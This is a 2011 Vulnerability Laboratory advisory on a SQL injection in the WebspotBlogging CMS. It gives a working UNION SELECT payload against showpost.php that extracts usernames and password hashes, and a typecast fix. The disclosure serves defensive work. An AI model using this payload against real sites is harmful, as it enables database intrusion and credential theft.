Document Title: =============== WebspotBlogging v3.02.x - SQL Injection Vulnerability Release Date: ============= 2011-06-14 Vulnerability Laboratory ID (VL-ID): ==================================== 90 Product & Service Introduction: =============================== Here are just some of the features of WebspotBlogging: * Expertly designed UI for easy navigation and reading * User accounts to keep your blog secure * User permissions (Admin, Mod, Member) * Comments, so that you know what your readers think of your post * Simple to use admin and posting panel for easy customisation and posting * Newsletter system to send updates to all of the members that wish to revieve them * Theme Manager to make your blog look the way you want it to * Version check so that you know if there have been any new updates to WebspotBlogging * RSS Syndication feed so that your visitors can be easily updated when you post * Archives so that your readers can browse through all the posts written * Quick installation through the simple to use installation script * Post Images to make your posts look good Convinced to download yet? Go on! It won t do any harm! Copy of the Vendors Homepage http://blogging.webspot.co.uk/ Abstract Advisory Information: ============================== An anonymous researcher discovered a critical SQL-Injection Vulnerability in WebspotBlogging. A remote attacker is able to execute own sql statements and gather User Data, which include Password-Hashes. Vulnerability Disclosure Timeline: ================================== N/A Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A sql injection vulnerability is detected on WebspotBlogging open source CMS. The vulnerability allows an attacker to infiltrate & compromise the web-application dbms. Vulnerable Module(s): [+] Show Posts Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... Path : http://www.server.com/storefolder/*** File : showpost.php Para : ?id= Input : \' UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10 from users order by \' http://127.0.0.1/webspot/showpost.php?id=%27%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6,7,8,9,10%20from%20users%20order%20by%20%27 Solution - Fix & Patch: ======================= Use typecasts to work secure. Change Line 21 in showpost.php from: $sql = SELECT * FROM blog WHERE pid = .$_GET[id].;; to $sql = SELECT * FROM blog WHERE pid = .(int)$_GET[id].;; Security Risk: ============== The security risk of the sql injection vulnerability is estimated as high. Credits & Authors: ================== N/A - Anonymous Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory